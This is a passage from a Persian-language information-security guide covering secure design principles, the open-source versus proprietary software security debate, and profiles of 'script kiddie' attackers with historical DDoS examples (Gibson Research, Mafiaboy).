ﻫﺮﺟﺎ ﻛﻪ ﺍﻣﻜﺎﻧﭙﺬﻳﺮ ﺑﺎﺷﺪ ،ﺩﺳﺘﺮﺳﻲ ﺑﻪ ﻣﻨﺎﺑﻊ ﺳﻴﺴﺘﻢ ﺑﺎﻳﺪ ﺑﻪ ﺑﺮﺁﻭﺭﺩﻩ ﺷﺪﻥ ﺑﻴﺶ ﺍﺯ ﻳﻚ ﺷﺮﻁ ﺑﺴﺘﮕﻲ ﺩﺍﺷﺘﻪ ﺑﺎﺷﺪ.
ﺣﺪﺍﻗﻞ ﻣﻜﺎﻧﻴﺰﻡ ﻣﺸﺘﺮﻙ
ﻛﺎﺭﺑﺮﺍﻥ ﺑﺎﻳﺪ ﺗﻮﺳﻂ ﺳﻴﺴﺘﻢ ﺍﺯ ﻳﻜﺪﻳﮕﺮ ﺟﺪﺍ ﺷﻮﻧﺪ .ﺍﻳﻨﻜﺎﺭ ،ﻫﻢ ﻛﻨﺘﺮﻝ ﻣﺨﻔﻴﺎﻧﻪ ﻭ ﻫﻢ ﺗﻼﺷﻬﺎﻱ ﻣـﺸﺘﺮﻙ ﺑـﺮﺍﻱ ﻏﻠﺒـﻪ ﺑـﺮ ﻣﻜﺎﻧﻴﺰﻣﻬـﺎﻱ
ﺍﻣﻨﻴﺖ ﺳﻴﺴﺘﻢ ﺭﺍ ﻣﺤﺪﻭﺩ ﻣﻲﻛﻨﺪ.
ﭘﺬﻳﺮﺵ ﺭﻭﺍﻧﻲ
ﻛﻨﺘﺮﻟﻬﺎﻱ ﺍﻣﻨﻴﺘﻲ ﺑﺎﻳﺪ ﺩﺭ ﻛﺎﺭﺑﺮﺩ ﺁﺳﺎﻥ ﺑﺎﺷﻨﺪ ﺗﺎ ﺩﺭ ﻋﻤﻞ ﺍﺯ ﺁﻧﻬﺎ ﺍﺳﺘﻔﺎﺩﻩ ﺷﻮﺩ ﻭ ﻛﻨﺎﺭ ﮔﺬﺍﺷﺘﻪ ﻧﺸﻮﻧﺪ.
ﻣﺘﺄﺳﻔﺎﻧﻪ ﻃﺮﺍﺣﺎﻥ ﻫﻴﭽﮕﺎﻩ ﺍﻳﻦ ﻣﻌﻴﺎﺭﻫﺎ ﺭﺍ ﻳﺎﺩ ﻧﻤﻲﮔﻴﺮﻧﺪ ،ﺍﮔﺮ ﻫﻢ ﻳﺎﺩ ﺑﮕﻴﺮﻧﺪ ﺁﻧﻬﺎ ﺭﺍ ﺍﺯ ﻳﺎﺩ ﻣﻲﺑﺮﻧﺪ ،ﺍﺯ ﺭﺍﻫﻬﺎﻱ ﻣﻴﺎﻧﺒﺮ ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﻛﻨﻨﺪ ،ﻳﺎ
ﺑﻪ ﺍﻳﻦ ﻧﺘﻴﺠﻪ ﻣﻲﺭﺳﻨﺪ ﻛﻪ ﺍﻳﻦ ﻣﺴﺎﺋﻞ ﺁﻧﻘﺪﺭ ﺍﻫﻤﻴﺖ ﻧﺪﺍﺭﻧﺪ ﻛﻪ ﺧﻮﺩ ﺭﺍ ﺩﺭﮔﻴﺮ ﺁﻥ ﻧﻤﺎﻳﻨﺪ .ﺩﺭﻧﺘﻴﺠﻪ ﺳﻴﺴﺘﻢﻋﺎﻣﻠﻬﺎ ،ﺍﻟﮕﻮﺭﻳﺘﻤﻬﺎ ،ﺑﺮﻧﺎﻣﻪﻫﺎﻱ
ﻛﺎﺭﺑﺮﺩﻱ ﻭ ﻧﺮﻡﺍﻓﺰﺍﺭﻫﺎﻱ ﻓﺮﺍﻭﺍﻧﻲ ﻭﺟﻮﺩ ﺩﺍﺭﻧﺪ ﻛﻪ ﻃﺮﺍﺣﻲ ﻧﺎﻗﺺ ﺩﺍﺭﻧﺪ ﻭﻟﻲ ﺩﺭ ﺳﻄﺢ ﻭﺳﻴﻌﻲ ﻣـﻮﺭﺩ ﺍﺳـﺘﻔﺎﺩﻩ ﻗـﺮﺍﺭ ﻣـﻲﮔﻴﺮﻧـﺪ ﻭ ﻣـﺪﻋﻲ
ﻫﺴﺘﻨﺪ ﻛﻪ ﺑﺨﺸﻲ ﺍﺯ ﺯﻳﺮﺑﻨﺎﻱ ﺍﻣﻨﻴﺖ ﺩﺭ ﺳﻴﺴﺘﻢ ﻫﺴﺘﻨﺪ .ﻃﺮﺍﺣﻲ ﻧﺎﻣﻨﺎﺳﺐ ﻣﻨﺠﺮ ﺑﻪ ﺑﺮﻭﺯ ﻣﺸﻜﻼﺕ ﻭ ﺁﺛﺎﺭ ﺟﺎﻧﺒﻲ ﭘﻴﺶﺑﻴﻨﻲﻧﺸﺪﻩ ﻣﻲﺷﻮﺩ
ﻛﻪ ﻣﻤﻜﻦ ﺍﺳﺖ ﻣﻮﺟﺐ ﺧﺮﺍﺑﻴﻬﺎﻱ ﺗﺼﺎﺩﻓﻲ ﺩﺭ ﺳﻴﺴﺘﻤﻬﺎ ﻳﺎ ﺍﻃﻼﻋﺎﺕ ﺷﻮﺩ ﻭ ﻳﺎ ﻋﺎﻣﺪﺍﻧﻪ ﺗﻮﺳﻂ ﻳﻚ ﻣﻬـﺎﺟﻢ ﻣـﻮﺭﺩ ﺳـﻮﺀ ﺍﺳـﺘﻔﺎﺩﻩ ﻗـﺮﺍﺭ
ﺑﮕﻴﺮﺩ.
ﻧﺮﻡﺍﻓﺰﺍﺭ ﺁﺯﺍﺩ ﺩﺭ ﻣﻘﺎﺑﻞ ﻧﺮﻡﺍﻓﺰﺍﺭ ﺍﺧﺘﺼﺎﺻﻲ
ﻳﻜﻲ ﺍﺯ ﻣﺒﺎﺣﺚ ﺑﺤﺚ ﺑﺮﺍﻧﮕﻴﺰﺗﺮ ﺩﺭ ﻃﺮﺍﺣﻲ ﻧﺮﻡﺍﻓﺰﺍﺭ ﺍﻳﻦ ﺍﺳﺖ ﻛﻪ ﺁﻳﺎ ﻓﺮﺍﻳﻨﺪﻫﺎﻱ ﺗﻮﺳﻌﻪﺍﻱ ﻛﻪ ﺁﺯﺍﺩﺍﻧﻪ ﻣﺘﻦ ﺑﺮﻧﺎﻣﻪ ﺭﺍ ﺑﺮﺍﻱ ﺑﺮﺭﺳﻲ ،ﺗﻐﻴﻴﺮ،
ﻭ ﺗﻮﺯﻳﻊ ﻣﺠﺪﺩ )"ﻧﺮﻡﺍﻓﺰﺍﺭ ﺁﺯﺍﺩ" ﻳﺎ "ﻣﺘﻦﺑﺎﺯ"( ﺑﺼﻮﺭﺕ ﺁﺯﺍﺩ ﺩﺭ ﺩﺳﺘﺮﺱ ﻗﺮﺍﺭ ﻣﻲﺩﻫﻨﺪ ،ﺑﺎﻳﺪ ﺑﻪ ﺩﻟﻴﻞ ﻣﺴﺎﺋﻞ ﺍﻣﻨﻴﺘﻲ ﺑﺮ ﻧﺮﻡﺍﻓﺰﺍﺭﻫـﺎﻱ ﺍﺧﺘـﺼﺎﺻﻲ
)"ﻣﺘﻦﺑﺴﺘﻪ"( ﺗﺮﺟﻴﺢ ﺩﺍﺩﻩ ﺷﻮﻧﺪ ﻳﺎ ﻧﻪ.
ﺍﺯ ﻳﻚ ﻃﺮﻑ ﺍﮔﺮ ﻣﺘﻦ ﺑﺮﻧﺎﻣﻪ ﺑﺼﻮﺭﺕ ﺁﺯﺍﺩ ﺩﺭ ﺩﺳﺘﺮﺱ ﺑﺎﺷﺪ ﻛﺎﺭ ﻣﻬﺎﺟﻤﻴﻦ ﺭﺍ ﺩﺭ ﭘﻴﺪﺍ ﻛﺮﺩﻥ ﺍﺷﻜﺎﻻﺕ ﻗﺎﺑﻞ ﺳﻮﺀ ﺍﺳـﺘﻔﺎﺩﻩ ﺩﺭ ﺑﺮﻧﺎﻣـﻪ ﺑـﺎ
ﺧﻮﺍﻧﺪﻥ ﻣﺘﻦ ﺑﺮﻧﺎﻣﻪ ﺭﺍﺣﺖﺗﺮ ﻣﻲﻛﻨﺪ .ﭼﻮﻥ ﻃﺒﻘﺎﺕ ﻣﺘﺪﺍﻭﻝ ﻓﺮﺍﻭﺍﻧﻲ ﺍﺯ ﺧﻄﺎﻫﺎﻱ ﺑﺮﻧﺎﻣﻪﺍﻱ ﻭﺟﻮﺩ ﺩﺍﺭﺩ ﻛﻪ ﻣﻨﺠﺮ ﺑﻪ ﺁﺳﻴﺐﭘﺬﻳﺮﻳﻬﺎ ﻣﻲﺷﻮﺩ،
ﺣﺘﻲ ﮔﺎﻫﻲ ﺍﻭﻗﺎﺕ ﻣﺘﻦ ﺑﺮﻧﺎﻣﻪ ﺭﺍ ﻣﻲﺗﻮﺍﻥ ﺑﻪ ﺑﺮﻧﺎﻣﻪﻫﺎﻱ ﺗﺤﻠﻴﻞ ﺧﻮﺩﻛﺎﺭ ﺳﭙﺮﺩ ﺗﺎ ﻣـﺸﻜﻼﺕ ﺭﺍ ﺁﺷـﻜﺎﺭ ﻛﻨﻨـﺪ .ﻣـﺸﻜﻼﺕ ﻧـﺮﻡﺍﻓﺰﺍﺭﻫـﺎﻱ
ﻣﺘﻦﺑﺎﺯ ﻋﻤﺪﺗﹰﺎ ﭘﻴﺪﺍ ﺷﺪﻩﺍﻧﺪ ﻭ ﻣﻮﺭﺩ ﺳﻮﺀ ﺍﺳﺘﻔﺎﺩﻩ ﻗﺮﺍﺭ ﮔﺮﻓﺘﻪﺍﻧﺪ.
ﺍﺯ ﻃﺮﻑ ﺩﻳﮕﺮ ﻧﺮﻡﺍﻓﺰﺍﺭ ﻣﺘﻦﺑﺴﺘﻪ ﻋـﻼﺝ ﺩﺭﺩ ﻧﻴـﺴﺖ .ﺩﺭ ﺑـﺴﻴﺎﺭﻱ ﺍﺯ ﻣـﻮﺍﺭﺩ ﻧـﺮﻡﺍﻓﺰﺍﺭﻫـﺎ ﺭﺍ ﻣـﻲﺗـﻮﺍﻥ "ﻣﻬﻨﺪﺳـﻲ ﻣﻌﻜـﻮﺱ" ﻧﻤـﻮﺩ ﻳـﺎ
ﺁﺳﻴﺐﭘﺬﻳﺮﻳﻬﺎ ﻣﻲﺗﻮﺍﻧﻨﺪ ﺍﺯ ﻃﺮﻳﻖ ﺍﺭﺯﻳﺎﺑﻲ ﺟﻌﺒﻪ ﺳﻴﺎﻩ ٣٢ﺑﺮﻧﺎﻣﻪ ﺑﺪﻭﻥ ﺍﻳﻨﻜﻪ ﻣﺘﻦ ﺑﺮﻧﺎﻣﻪ ﺩﺭ ﺩﺳﺘﺮﺱ ﺑﺎﺷﺪ ﺗـﺸﺨﻴﺺ ﺩﺍﺩﻩ ﺷـﻮﻧﺪ .ﺑـﺪﻳﻬﻲ
ﻼ ﺑﺮﻧﺎﻣﺔ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﺓ ﺍﻃﻼﻋﺎﺕ ﺍﻳﻨﺘﺮﻧﺘﻲ ﻣﺎﻳﻜﺮﻭﺳﺎﻓﺖ ) ٣٣(IISﻧﺘﻮﺍﻧﺴﺘﻪ ﺍﺯ ﺳﻮﺀ ﺍﺳﺘﻔﺎﺩﻩ ﻣﻬـﺎﺟﻤﻴﻦ ﺍﺯ
ﺍﺳﺖ ﻋﺪﻡ ﺩﺳﺘﺮﺳﻲ ﺑﻪ ﻣﺘﻦ ﻣﺜ ﹰ
ﻼ
ﺁﺳﻴﺐﭘﺬﻳﺮﻳﻬﺎﻱ ﻣﺨﺘﻠﻒ ﺁﻥ ﺟﻠﻮﮔﻴﺮﻱ ﻛﻨﺪ ﻭ ﺑﻨﻈﺮ ﻣﻲﺭﺳﺪ ﺍﻳﻦ ﻣﺤﺼﻮﻝ ﺗﻌﺪﺍﺩ ﺑﻴﺸﺘﺮﻱ ﺳﻮﺀ ﺍﺳﺘﻔﺎﺩﻩ ﮔـﺰﺍﺭﺵ ﺷـﺪﻩ ﻧـﺴﺒﺖ ﺑـﻪ ﻣـﺜ ﹰ
ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩ ﻭﺏ ﺁﭘﺎﭼﻲ - ٣٤ﻛﻪ ﻣﺘﻦ ﺁﻥ ﺩﺭ ﺍﺧﺘﻴﺎﺭ ﻋﻤﻮﻡ ﺍﺳﺖ -ﺩﺍﺷﺘﻪ ﺑﺎﺷﺪ.
ﺩﺭ ﺑﺮﻧﺎﻣﺔ ﻣﺘﻦﺑﺎﺯ ،ﺗﻮﻟﻴﺪﻛﻨﻨﺪﮔﺎﻥ ﻭ ﻛﺎﺭﺑﺮﺍﻥ ﺑﺮﻧﺎﻣﻪ ﻣﻲﺗﻮﺍﻧﻨﺪ ﻣﺸﻜﻼﺕ ﻭ ﺭﺍﻩﺣﻞ ﺁﻧﻬـﺎ ﺭﺍ ﻗﺒـﻞ ﺍﺯ ﻣﻬـﺎﺟﻤﻴﻦ ﭘﻴـﺪﺍ ﻛﻨﻨـﺪ ﻭ ﭘـﻴﺶ ﺍﺯ ﻫـﺮ
ﺳﻮﺀ ﺍﺳﺘﻔﺎﺩﻩﺍﻱ ﺁﻧﻬﺎ ﺭﺍ ﻣﻨﺘﺸﺮ ﺳﺎﺯﻧﺪ .ﺳﻴﺴﺘﻢﻋﺎﻣﻞ OpenBSDﻛﻪ ﻳـﻚ ﻧـﺮﻡﺍﻓـﺰﺍﺭ ﺁﺯﺍﺩ ﺍﺳـﺖ ،ﺩﺭ ﺳـﻄﺢ ﻭﺳـﻴﻌﻲ ﺑﻌﻨـﻮﺍﻥ ﻳﻜـﻲ ﺍﺯ
Backdoor
Blackbox Testing
Microsoft Internet Information Server
Apache Web Server
31
32
33
34
٢٦٧
ﺑﺨﺶ ﭘﻨﺠﻢ :ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺭﺍﻫﺒﺮﺍﻥ ﻓﻨﻲ
ﻝ ﺣﺎﺿﺮ ﺷﻨﺎﺧﺘﻪ ﺷﺪﻩ ﺍﺳﺖ ،ﻋﻤﺪﺗﹰﺎ ﺑﻪ ﺩﻟﻴﻞ ﺍﻳﻨﻜﻪ ﻫﺮ ﺧﻂ ﺍﺯ ﻣﺘﻦ ﺑﺮﻧﺎﻣﺔ ﻫﺴﺘﺔ ﺍﺻـﻠﻲ ،٣٥ﺗﻮﺳـﻂ
ﺍﻳﻤﻦﺗﺮﻳﻦ ﺳﻴﺴﺘﻢﻋﺎﻣﻠﻬﺎﻱ ﻣﻮﺟﻮﺩ ﺣﺎ ﹺ
ﺗﻮﻟﻴﺪﻛﻨﻨﺪﮔﺎﻧﺶ ﺍﺯ ﻧﻈﺮ ﺍﻣﻨﻴﺘﻲ ﻧﻴﺰ ﻣﻤﻴﺰﻱ ﺷﺪﻩ ﺍﺳﺖ .ﻫﺴﺘﻪﻫﺎﻱ ﺍﺻﻠﻲ ﺳﻴﺴﺘﻢﻋﺎﻣﻠﻬﺎﻱ ﻣﺘﻦﺑﺎﺯ ﺩﻳﮕـﺮ -ﺍﺯ ﺟﻤﻠـﻪ - Linuxﺑـﻪ ﺍﻳـﻦ
ﺷﺪﺕ ﺑﺎﺯﺑﻴﻨﻲ ﻧﻤﻲﺷﻮﻧﺪ ﻭ ﺣﺎﻭﻱ ﻗﻄﻌﻪﺑﺮﻧﺎﻣﻪﻫﺎﻳﻲ ﺍﺯ ﺗﻌﺪﺍﺩ ﺯﻳﺎﺩﻱ ﺍﺯ ﺗﻮﺳﻌﻪﺩﻫﻨﺪﮔﺎﻥ ﻫﺴﺘﻨﺪ .ﻣﺸﻜﻞ ﻣﻲﺗـﻮﺍﻥ ﺩﺭﺟـﻪ ﺑـﺎﺯﺑﻴﻨﻲ ﺍﻣﻨﻴﺘـﻲ
ﺳﻴﺴﺘﻢﻋﺎﻣﻠﻬﺎﻱ ﺍﺧﺘﺼﺎﺻﻲ Unixﺍﺯ ﻗﺒﻴﻞ Solarisﺭﺍ ﺩﺍﻧﺴﺖ.
ﺷﻨﺎﺧﺘﻦ ﻣﻬﺎﺟﻢ
ﭼﻪ ﻛﺴﻲ ﺑﻪ ﺭﺍﻳﺎﻧﻪﻫﺎﻱ ﻳﻚ ﺷﺒﻜﻪ ﺑﺎ ﺧﺒﺮﻩﺗﺮﻳﻦ ﺍﻧﻮﺍﻉ ﺣﻤﻼﺕ ﻧﻔﻮﺫ ﻣﻲﻛﻨﺪ؟ ﺍﻳـﻦ ﻣـﺴﺌﻠﻪ ﺗﻘﺮﻳﺒـﹰﺎ ﺍﻫﻤﻴﺘـﻲ ﻧـﺪﺍﺭﺩ؛ ﻳﻌﻨـﻲ ﻣﻬـﻢ ﻧﻴـﺴﺖ
ﻣﻬﺎﺟﻤﻴﻦ ﻣﻤﻜﻦ ﺍﺳﺖ ﭼﻪ ﻛﺴﺎﻧﻲ ﺑﺎﺷﻨﺪ ،ﺑﻠﻜﻪ ﺩﺭ ﻣﻘﺎﺑﻞ ﻫﻤﺔ ﺁﻧﻬﺎ ﺑﺎﻳﺪ ﺍﺯ ﺳﻴﺴﺘﻢ ﻣﺤﺎﻓﻈﺖ ﻛﺮﺩ.
Script Kiddieﻫﺎ
ﻫﻤﺎﻧﮕﻮﻧﻪ ﻛﻪ ﺍﺯ ﻧﺎﻡ ﺁﻧﻬﺎ ﭘﻴﺪﺍﺳﺖ ،ﺩﺭ ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﻣﻮﺍﺭﺩ ﻣﻬﺎﺟﻤﻴﻦ ﻛﻮﺩﻛﺎﻥ ﻭ ﻧﻮﺟﻮﺍﻧﺎﻥ ﻫﺴﺘﻨﺪ؛ ﻛـﺴﺎﻧﻲ ﻛـﻪ ﻣﺘﺄﺳـﻔﺎﻧﻪ ﻫﻨـﻮﺯ ﺑـﻪ ﺣـﺲ
ﻣﺴﺌﻮﻟﻴﺖ ﻭ ﺗﺸﺨﻴﺺ ﻛﺎﻓﻲ ﺑﺮﺍﻱ ﻛﻨﺘﺮﻝ ﻣﻬﺎﺭﺗﻬﺎﻱ ﺗﻜﻨﻴﻜﻲ ﺧﻮﺩ ﻧﺮﺳﻴﺪﻩﺍﻧﺪ.
ﺑﻪ ﺟﻮﺍﻧﺎﻧﻲ ﻛﻪ ﺍﺯ ﺍﺑﺰﺍﺭﻫﺎﻱ ﺧﺒﺮﺓ ﺗﻬﺎﺟﻢ ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﻛﻨﻨﺪ ) Script Kiddieﻓﺴﻘﻠﻲﻫﺎﻱ ﻗﻄﻌﻪﺑﺮﻧﺎﻣﻪ( ﻣﻲﮔﻮﻳﻨﺪ .ﺍﻳـﻦ ﻋﺒـﺎﺭﺕ ﺗﻤـﺴﺨﺮﺁﻣﻴﺰ
ﺍﺳﺖ .ﻭﺍﮊﺓ "ﻗﻄﻌﻪﺑﺮﻧﺎﻣﻪ" ﺑﻪ ﺍﻳﻦ ﻣﺴﺌﻠﻪ ﺍﺷﺎﺭﻩ ﺩﺍﺭﺩ ﻛﻪ ﺍﻳﻦ ﻣﻬﺎﺟﻤﻴﻦ ﺑﺠﺎﻱ ﺍﻳﻨﻜﻪ ﺣﻤـﻼﺕ ﺧـﻮﺩ ﺭﺍ ﭘﺪﻳـﺪ ﺁﻭﺭﻧـﺪ ﺍﺯ ﻗﻄﻌـﻪﺑﺮﻧﺎﻣـﻪﻫـﺎﻱ
ﺗﻬﺎﺟﻤﻲ ﺁﻣﺎﺩﻩ ﻛﻪ ﻣﻲﺗﻮﺍﻧﺪ ﺍﺯ ﺍﻳﻨﺘﺮﻧﺖ downloadﺷﻮﺩ ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﻛﻨﻨﺪ .ﺍﻳﻦ ﻣﻬﺎﺟﻤﻴﻦ ﺍﺯ ﺁﻥ ﺟﻬﺖ "ﻓﺴﻘﻠﻲ" ﻧﺎﻣﻴﺪﻩ ﻣـﻲﺷـﻮﻧﺪ ﻛـﻪ
ﺳﻦ ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﺁﻧﻬﺎ ﻫﻨﮕﺎﻡ ﺩﺳﺘﮕﻴﺮﻱ ﺯﻳﺮ ﺳﻦ ﻗﺎﻧﻮﻧﻲ ﺑﻮﺩﻩ ﺍﺳﺖ.
ﻓﺴﻘﻠﻲﻫﺎﻱ ﻗﻄﻌﻪﺑﺮﻧﺎﻣﻪ ﺑﺎﻳﺪ ﺑﻌﻨﻮﺍﻥ ﻳﻚ ﺗﻬﺪﻳﺪ ﻭ ﺧﻄﺮ ﺟﺪﻱ ﺑﻪ ﺣﺴﺎﺏ ﺁﻳﻨﺪ ،ﺑﻪ ﻫﻤﺎﻥ ﺩﻟﻴـﻞ ﻛـﻪ ﺍﺯ ﻧﻮﺟـﻮﺍﻧﻲ ﻛـﻪ ﺍﺳـﻠﺤﻪ ﺩﺍﺭﺩ ﺑﺎﻳـﺪ
ﺗﺮﺳﻴﺪ .ﺩﺭ ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﻣﻮﺍﺭﺩ ﺍﺯ ﻧﻮﺟﻮﺍﻧﺎﻧﻲ ﻛﻪ ﺍﺳﻠﺤﺔ ﺳﺒﻚ ﺣﻤﻞ ﻣﻲﻛﻨﻨﺪ ﺑﺎﻳﺪ ﺣﺘﻲ ﺑﻴﺶ ﺍﺯ ﺑﺰﺭﮔﺴﺎﻻﻥ ﺗﺮﺳﻴﺪ ،ﭼﺮﺍ ﻛـﻪ ﻳـﻚ ﻧﻮﺟـﻮﺍﻥ
ﻭﻗﺘﻲ ﻣﻲﺧﻮﺍﻫﺪ ﻣﺎﺷﻪ ﺭﺍ ﺑﻜﺸﺪ ﻛﻤﺘﺮ ﺍﺣﺘﻤﺎﻝ ﺩﺍﺭﺩ ﭘﻴﺎﻣﺪﻫﺎﻱ ﻋﻤﻞ ﺧﻮﺩ ﺭﺍ ﺑﻔﻬﻤﺪ ﻭ ﻟﺬﺍ ﺍﺣﺘﻤﺎﻝ ﺑﻴﺸﺘﺮﻱ ﺩﺍﺭﺩ ﻛﻪ ﻣﺎﺷﻪ ﺭﺍ ﺑﻜﺸﺪ.
ﺍﻳﻦ ﻣﺴﺌﻠﻪ ﺑﺮﺍﻱ ﻓﺴﻘﻠﻲﻫﺎﻱ ﻗﻄﻌﻪﺑﺮﻧﺎﻣﻪ ﻫﻢ ﺻﺪﻕ ﻣﻲﻛﻨﺪ .ﺑﺮﺍﻱ ﻣﺜﺎﻝ ﺩﺭ ﺳﺎﻝ ۲۰۰۱ﭘﺎﻳﮕﺎﻩ ﻭﺏ ﻣﺆﺳﺴﻪ ﺗﺤﻘﻴﻘﺎﺗﻲ ﮔﻴﺒﺴﻮﻥ ٣٦ﻫﺪﻑ
ﻳﻚ ﺗﻬﺎﺟﻢ ﺗﻮﺯﻳﻊﺷﺪﻩ ﺧﺮﺍﺑﻲ ﺳﺮﻭﻳﺲ ) ٣٧(DDoSﻗﺮﺍﺭ ﮔﺮﻓﺖ ﻛﻪ ﺁﻧﺮﺍ ﺑﻴﺶ ﺍﺯ ۱۷ﺳﺎﻋﺖ ﺍﺯ ﻛﺎﺭ ﺍﻧﺪﺍﺧﺖ .ﺗﻬﺎﺟﻢ ﺍﺯ ﻃﺮﻳﻖ ﺑـﻴﺶ ﺍﺯ ۴۰۰
ﺭﺍﻳﺎﻧﻪ ﻣﺒﺘﻨﻲ ﺑﺮ Windowsﺭﻭﻱ ﺍﻳﻨﺘﺮﻧﺖ ﺑﻪ ﺍﺟﺮﺍ ﺭﺳﻴﺪ ﻛﻪ ﺑﺮﺍﻱ ﺍﻧﺠﺎﻡ ﻳﻚ ﺣﻤﻠﺔ ﺧﻮﺩﻛﺎﺭ ﻣﻮﺭﺩ ﺳﻮﺀ ﺍﺳﺘﻔﺎﺩﻩ ﻗﺮﺍﺭ ﮔﺮﻓﺘﻪ ﺑﻮﺩﻧﺪ .ﻭﻗﺘـﻲ
ﻣﺴﺌﻠﻪ ﺭﻭﺷﻦ ﺷﺪ ،ﺍﺳﺘﻴﻮ ﮔﻴﺒﺴﻮﻥ ٣٨ﺗﻮﺍﻧﺴﺖ ﻳﻚ ﻧﺴﺨﻪ ﺍﺯ ﺑﺮﻧﺎﻣﺔ ﺣﻤﻠﻪ ﺭﺍ ﺑﺪﺳﺖ ﺁﻭﺭﺩ ،ﻭ ﺳﭙﺲ ﺁﻧﺮﺍ ﻣﻬﻨﺪﺳﻲ ﻣﻌﻜﻮﺱ ﻭ ﺭﺩﻳﺎﺑﻲ ﻛﻨـﺪ.
ﺩﺭ ﻧﻬﺎﻳﺖ ﻣﺸﺨﺺ ﺷﺪ ﻛﻪ ﻓﺮﺩ ﻣﻬﺎﺟﻢ ﺑﻪ ﭘﺎﻳﮕﺎﻩ ﻭﺏ ﺍﻭ ﻳﻚ ﺩﺧﺘﺮ ۱۳ﺳﺎﻟﻪ ﺑﻮﺩﻩ ﺍﺳﺖ.
ﻓﺴﻘﻠﻲﻫﺎﻱ ﻗﻄﻌﻪﺑﺮﻧﺎﻣﻪ ﻣﻤﻜﻦ ﺍﺳﺖ ﻣﻬﺎﺭﺕ ﻓﻨﻲ ﻻﺯﻡ ﺑﺮﺍﻱ ﻧﻮﺷﺘﻦ ﻗﻄﻌﻪﺑﺮﻧﺎﻣﻪ ﻭ ﺍﺳﺒﻬﺎﻱ ﺗﺮﺍﻭﺍﻱ ﻣﺨﺼﻮﺹ ﺧـﻮﺩ ﺭﺍ ﻧﺪﺍﺷـﺘﻪ ﺑﺎﺷـﻨﺪ،
ﻭﻟﻲ ﺍﻳﻦ ﻣﺴﺌﻠﻪ ﺑﺮﺍﻳﺸﺎﻥ ﻣﺸﻜﻞ ﺯﻳﺎﺩﻱ ﺍﻳﺠﺎﺩ ﻧﻤﻲﻛﻨﺪ .ﺁﻧﻬﺎ ﺍﺑﺰﺍﺭ ﺩﺭ ﺍﺧﺘﻴﺎﺭ ﺩﺍﺭﻧﺪ ﻭ ﻣﺎﻳﻠﻨﺪ ﺍﺯ ﺍﺑﺰﺍﺭﻫﺎﻱ ﺧﻮﺩ ﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﻨﺪ؛ ﻳﺎ ﻧﻤﻲﻓﻬﻤﻨـﺪ
ﻣﻮﺟﺐ ﭼﻪ ﺧﺴﺎﺭﺍﺗﻲ ﻣﻲﺷﻮﻧﺪ ﻭ ﻳﺎ ﺑﺮﺍﻳﺸﺎﻥ ﺍﻫﻤﻴﺘﻲ ﻧﺪﺍﺭﺩ.
Kernel
Gibson Research Corporation
Distributed Denial of Service Attack
Steve Gibson
35
36
37
38
ﺑﺨﺶ ﭘﻨﺠﻢ
ﺩﺭ ﻣﻮﺭﺩ ﻣﺸﺎﺑﻪ ﺩﻳﮕﺮﻱ ﻭﻗﺘﻲ ﻣﻘﺎﻣﺎﺕ ﻣﺴﺌﻮﻝ ﻛﺎﻧﺎﺩﺍ ﺩﺭ ﻧﻮﺯﺩﻫﻢ ﺁﻭﺭﻳﻞ ﺳﺎﻝ "Mafiaboy" ۲۰۰۰ﺭﺍ ﺑﻪ ﺧﺎﻃﺮ ﺣﻤﻼﺕ ﻣﺎﻩ ﻓﻮﺭﻳﻪ ﺳـﺎﻝ
۲۰۰۰ﺍﻭ ﺑﻪ ،CNN ،E*TRADE ،Yahooﻭ ﺑﺴﻴﺎﺭﻱ ﺩﻳﮕﺮ ﺍﺯ ﭘﺎﻳﮕﺎﻫﻬﺎﻱ ﭘﺮ ﺍﺯ ﭘﺮﻭﺭﻧﺪﻩﻫﺎﻱ ﺷﺨﺼﻲ ﻛﻪ ﻣﻮﺟﺐ ۱/۷ﻣﻴﻠﻴـﺎﺭﺩ ﺩﻻﺭ
ﺧﺴﺎﺭﺕ ﺷﺪﻩ ﺑﻮﺩ ﺑﺎﺯﺩﺍﺷﺖ ﻛﺮﺩﻧﺪ ،ﻧﺘﻮﺍﻧﺴﺘﻨﺪ ﻧﺎﻡ ﻣﺘﻬﻢ ﺭﺍ ﺑﺮﺍﻱ ﻣﺮﺩﻡ ﻣﻨﺘﺸﺮ ﻛﻨﻨﺪ؛ ﭼﺮﺍ ﻛﻪ ﭘـﺴﺮﺑﭽﺔ ۱۶ﺳـﺎﻟﻪ ،ﺗﺤـﺖ ﺣﻤﺎﻳـﺖ ﻗـﺎﻧﻮﻥ
ﺣﻔﺎﻇﺖ ﺍﺯ ﺯﻧﺪﮔﻲ ﺷﺨﺼﻲ ﺧﺮﺩﺳﺎﻻﻥ ﻛﺎﻧﺎﺩﺍ ﻗﺮﺍﺭ ﺩﺍﺷﺖ.
٢٦٨
ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ
ﻳﻚ ﻓﺴﻘﻠﻲ ﻗﻄﻌﻪﺑﺮﻧﺎﻣﻪ ﻭﻗﺘﻲ ﺑﺰﺭﮒ ﺷﺪ ﭼﻜﺎﺭﻩ ﺧﻮﺍﻫﺪ ﺷﺪ؟ ﻫـﻴﭽﻜﺲ ﻫﻨـﻮﺯ ﻣﻄﻤـﺌﻦ ﻧﻴـﺴﺖ؛ ﻫـﻴﭻ ﺑﺮﺭﺳـﻲ ﻣـﻮﺛﻘﻲ ﻭﺟـﻮﺩ ﻧـﺪﺍﺭﺩ.
